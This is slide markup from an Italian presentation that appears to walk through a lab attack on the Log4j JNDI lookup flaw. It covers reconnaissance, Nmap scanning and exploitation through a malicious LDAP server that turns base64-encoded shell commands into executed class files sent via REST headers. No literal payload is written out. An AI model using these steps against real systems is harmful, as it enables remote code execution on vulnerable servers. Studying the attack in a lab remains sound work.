              <a:t> nel 2016 aveva segnalato la possibilità di effettuare remote code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> di JNDI.</a:t>
            </a:r>
          </a:p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3779FF3-FF81-0189-E841-D31387650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5" y="4114853"/>
            <a:ext cx="8039199" cy="21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48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ABDB26F-C7EA-402B-2454-6B2BFB3E4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156" y="674131"/>
            <a:ext cx="9769687" cy="550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9786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C108E0-45CA-A925-9B43-D295C7029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Log4J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54E4C5-E53B-1E9E-D243-DE7DEB591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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Essa fa parte del progetto log4j della Apache Software Foundation. Negli anni il suo sviluppo è stato rallentato ed è divenuta difficile da manutenere a causa della necessità di restare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>retrocompatibile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con versioni molto vecchie di java  (in particolare Java3 e Java4).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Da qui Log4j termina il proprio ciclo di vita in favore di un nuovo progetto: Log4j2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21360024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87D140A-281A-FE8E-26F5-CCE6BFE0E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4" y="335821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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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1C8080-1306-F875-FD6C-426145FDA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8"/>
            <a:ext cx="6857365" cy="3651250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>In realtà quindi questa vulnerabilità era già nota ma non contestualizzata a log4j.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A questo punto si cerca di effettuare questo test sull’asset indicato.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25143333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5E02250-86D7-5CAE-CE47-C7B901BE7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 err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> target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7E62ECA-140D-3CA9-D11D-15AA963F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8"/>
            <a:ext cx="6857365" cy="365125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sz="1500" dirty="0"/>
              <a:t>Questa fase consiste nel capire quali sono i servizi che vengono erogati all’esterno tramite tecniche di scansione delle porte attive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Nel nostro caso l’ambiente è in locale, ma le applicazioni web in produzione hanno associati dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> (domain name system). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Occorre quindi risalire all’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> del target per poter effettuare scansioni più approfondite. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Questo si può fare tramite il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>dnslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>, in quanto è il DNS che risolve i nomi di dominio tramite indirizzi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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99070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03C1799-3773-9FF4-A0F2-D89A399E6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 err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> target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490F657-CFD7-AD36-C0EF-D864EA09A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sz="1500" dirty="0"/>
              <a:t>Ricordando quindi la struttura del DNS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>root,TLD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>, autoritativo) possiamo risalire ripercorrendo le varie risoluzioni di dominio ad un pacchetto DNS di tipo A (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> con l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> associato). In questo caso verrà proposta la risoluzione dell’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.google.it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> come esempio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02CF1AF-1FC1-79ED-8672-124DFE3A12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5250" y="3583841"/>
            <a:ext cx="8203193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91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31D57FB-82B0-2642-4063-CCCDFA893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 err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> target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C7AAE85-580C-8DC0-1AE4-132AF9D224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In questo caso vengono fornite 2 risoluzioni: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 autoritativa : ottenuta dalla query DNS a partire dalla root domain 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1 non autoritativa: solitamente fornita dall’ internet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2715228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7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8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0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21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A5931F0-DB0A-5212-8F5F-97671F467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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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49CA671-8BED-9F3B-E22D-32DE279B7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8"/>
            <a:ext cx="6857365" cy="365125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sz="1500" dirty="0"/>
              <a:t>In questa fase viene effettuata la scansione delle porte attive nel nostro caso indagheremo tutta la rete locale tramite il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Per fare ciò dobbiamo capire prima di tutto lo spazio di indirizzamento impiegato, e questo lo si ottiene  dalla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> mask.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E4DDBE42-162C-14B6-46A3-4C53958E0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5" y="4446735"/>
            <a:ext cx="5624047" cy="1127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473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2A003A0-D144-2D83-D7B9-56F5FEF31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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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E662E3C-5D9C-CDD3-049E-DCF7432F5A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 fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>L’interfaccia in questione è la eth0 (ethernet) questo in realtà perché la scansione avverrà sulla macchina virtuale, impostata in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modalita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>bridged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. In realtà quella rappresenta la scheda di rete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>dell’host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. Che in questo caso è una wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>broadcom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Nei casi reali qualora fossimo connessi al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, dovremmo prendere in considerazione l’interfaccia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>WlanX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> dove x è il numero dell’interfaccia.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327384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94EBB448-0AC8-5916-FD3F-D0D139D6A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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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6A365BE-D569-D75C-DCBE-72C529BFAF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In questo caso la maschera è 255.255.255.0 ovvero gli ultimi 8 bit sono destinati all’indirizzamento degli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>In particolare 2^8 sono i possibili indirizzamenti delle macchine , tralasciando ovviamente due indirizzi. Quello con la parte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> posta tutti a 0 (che identifica la rete) e quello con la parte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> posta a tutti 1 (che identifica il broadcast).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>192.168.1.0 è l’indirizzo di rete e la maschera è 32-8=24 bit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387081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7F23FA8A-E95D-EA47-7210-8362D942A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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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2069132-D625-F801-EADB-A06F7D1508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966" y="1923030"/>
            <a:ext cx="4982433" cy="3321622"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9126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4B22B068-6E67-2A81-D289-56CDC57CB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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping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353DB7-BDB2-3549-5D9F-3C505E8D9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81145" y="1995391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La scansione ha riportato in particolare all’indirizzo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 192.168.1.114 una macchina che espone sulla porta 8080 la nostra applicazione web vulnerabile. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1127565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36F4620-81DD-A501-9EF8-CD1537942F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 err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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8DA4E25B-267E-D749-3C5D-BF756A1C3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875" y="1709937"/>
            <a:ext cx="7039590" cy="352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811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1C108E0-45CA-A925-9B43-D295C7029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Log4J v2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54E4C5-E53B-1E9E-D243-DE7DEB591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Il nuovo progetto di log4j acquisisce negli ultimi anni una diffusione esponenziale in quanto la sua particolare modularità ne permette la facile estensione e manutenibilità.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>La sua struttura permette infatti una facile integrazione di diversi plugin , in modo da adeguare i log in base alle architetture impiegate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18800640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6510F84-A63F-9FC4-C88A-7BEA180F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br>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Target Exploitation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D654A53-A16B-23B6-5D25-19CC9E4AC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sz="1500" dirty="0"/>
              <a:t>Per l’exploitation si utilizza un server LDAP Malevolo, quest’ultimo è un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> che espone 2 server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Il primo che in merito alla stringa LDAP inviata codifica i comandi di shell e li ingloba all’interno di un Runtime Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Un server HTTP che fa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> su una porta nota all’attaccante sulla quale quest’ultimo si metterà in ascolto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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1988126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5698877-4DE7-8C59-5B7B-A9B3F65FF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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Target Exploitation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20A69E6-5C5E-D141-CB07-BD5223C4D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Essendo la JNDI injection già nota nel 2015 ho utilizzato un LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> server presente all’interno del deep web. Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>marshalSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> LDAP. Quest’ultimo è reperibile soltanto da li in quanto è stato rimosso il suo codice da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Per rendere l’idea di quello che in linea di massima svolge il server malevolo, è stato scritto uno </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> esemplificativo per dare l’idea delle azioni che compie il server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18019855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459E44B-27A3-8AE3-4401-80C2B164B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pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3000" dirty="0"/>
              <a:t>Target Exploitation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B2276EF-125F-6F42-6B6B-9A0DA9C53D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1255" y="2106613"/>
            <a:ext cx="5670765" cy="2846387"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17883531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B5463E10-FB14-E3C4-BAF6-B4D860D16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Target Exploitation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553ED1-2304-8565-E9C0-27DD63627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sz="1500" dirty="0"/>
              <a:t>Nell’immagine precedente sono riportati i vari comandi messi a disposizione dal JAR. Esso riceve query LDAP, in particolare Basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t> permette di eseguire un comando di shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>/Base64 permette di eseguire un comando di shell convertendolo in una stringa base64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0"/>
              <a:t>Il secondo comando occorre per evitare errori sintattici qualora vi siano / e rendere  meno visibili i payload incriminati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3371338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C84F833-E082-DC1D-1374-5402E89FE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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Explotation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BD422F-8720-FAD5-0FAB-F5A18F660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875" y="2222030"/>
            <a:ext cx="7139010" cy="195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175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B7F3EFD-790E-C0EE-59EE-F3BF1FAA7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Target Exploitation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A921C7D-222A-A16D-4A50-7B22D56D6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In particolare basta parametrizzare l’exploit precedentemente riportato come segue: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Se nella query la stringa è base64 fai la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> e parametrizza l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con quel comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Altrimenti parametrizza solo l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con quel comando.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5991208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71A24F0-52DA-25FF-5233-A4CEE4B06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Target Exploitation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DE66B75-0153-4D2E-E9B6-2AB88668F2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Avviamo il server LDAP malevolo come segue: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A7B40C96-B279-91A6-F103-ADD360B32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682" y="2662909"/>
            <a:ext cx="6790008" cy="271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869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800B8BF3-1FC9-9481-1216-12DE09426C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Target Exploitation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1780897-F8D0-F345-8622-18E25137B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112" y="2128338"/>
            <a:ext cx="6782388" cy="198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9441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676FF6BE-C38E-D865-A3CF-B2FAF946D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Target Exploitation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05AABE-BEFC-38F7-A1DD-4282840B8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29192"/>
            <a:ext cx="8391967" cy="2846567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it-IT" sz="1300" dirty="0"/>
              <a:t>A questo punto l’attacco consiste nell’invocare delle chiamate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1"/>
              <a:t>rest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0"/>
              <a:t> dove all’interno della variabile loggata inseriamo la query che punta all’ LDAP malevolo. Per fare ciò è stata salvata una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1"/>
              <a:t>collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1"/>
              <a:t>postman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0"/>
              <a:t> con i vari comandi in descrizione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22028017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0DEF4177-7416-3F89-87DC-0024201E0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Target Exploitation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AB61BA5E-CEFD-6FA2-2A1B-F4E09B08DB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568" y="1787525"/>
            <a:ext cx="6304799" cy="368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07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39C146BD-8FC2-21C4-EF04-C57BCF23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Plugin Log4j v2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9ABA4E-89C2-83C4-F7A5-4657644E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206" y="2107096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Tra i plugin più impiegati abbiamo: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Core (per loggare i file di configurazione)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Converters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (converte stringhe in eventi)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KeyProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (cifra/decifra log)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 err="1"/>
              <a:t>Lookups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (risolve variabili specificate nel plugin)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="964438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C724875C-9819-C1CE-649F-D9FB86A3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Fasi dell’exploit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515FB9-FE7B-5BA6-D206-4DE3288B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 fontScale="85000" lnSpcReduction="2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it-IT" dirty="0"/>
              <a:t>L’attaccante eseguirà la chiamata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con le query LDAP nell’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> che puntano al proprio LDAP malevolo.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LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>builderà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>file.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in merito al comando inviato. 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L’applicativo cercherà di loggare la variabile, il metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> verificherà che il contesto è di tipo JNDI , quindi il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> scaricherà dal server LDAP il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>file.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> e lo eseguirà</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Eseguendolo </a:t>
            </a:r>
